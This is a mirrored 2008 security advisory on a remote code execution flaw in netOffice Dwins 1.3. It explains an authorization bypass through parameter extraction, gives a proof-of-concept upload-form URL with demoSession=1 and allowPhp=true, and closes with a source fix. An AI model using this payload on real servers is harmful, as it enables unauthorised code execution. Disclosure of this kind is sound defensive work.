AOH :: HP Unsorted N :: BX2173.HTM

netOffice Dwins 1.3 Remote code execution.



netOffice Dwins 1.3 Remote code execution.
netOffice Dwins 1.3 Remote code execution.



netOffice Dwins 1.3 Remote code execution.
--------------------------------------------------------

Product: netOffice Dwins
Version: 1.3 p2
Vendor: http://netofficedwins.sourceforge.net/ 
Date:    02/29/08

- Introduction

"netOffice Dwins is a free web based time tracking, timesheet, and
project management environment."

- Details

It is possible for an attacker to bypass authorization, upload arbitrary
PHP files, and then execute them on the server.

netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters
into the local variable space.  This has the same effect as turning
on register globals.  The code below is from includes/library.php.

//GET array
    if (!empty($_GET)) {
        extract($_GET);
    } else if (!empty($HTTP_GET_VARS)) {
        extract($HTTP_GET_VARS);
    }

This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application.  Setting the variable to one
bypasses the first check ($demoSession != true) but the second boolean
expression ($demoSession == 'true') evaluates to false thereby not
initializing the action variable to an empty string.

// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
    // a client user trying to get outside of the "client project site"
    if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'],
'projects_site'))) {
        header('Location: ../index.php?session=false');
        exit;
    }

// disable actions if demo user logged in demo mode
if (!empty($action)) {
    if ($demoSession == 'true') {
	echo "true";
        $closeTopic = '';
        $addToSiteTask = '';
        $removeToSiteTask = '';
        $addToSiteTopic = '';
        $removeToSiteTopic = '';
        $addToSiteTeam = '';
        $removeToSiteTeam = '';
        $action = '';
        $msg = 'demo';
    }
}

Next an attacker could use access the uploadfile.php form without
logging in to upload and execute PHP files.  Normally php files are
not allowed unless the allowPhp variable is set to true.

- Proof of Concept

action="http://target/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data">
Upload Form
Comments :
Upload :
 

- Solution Authors were notified on 2/19, no fix is currently available. Edit the source to prevent authorization bypass. in includes/library.php change if ($demoSession == 'true') { to if ($demoSession == true) { Author: dB Email: dB [at] rawsecurity.org

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.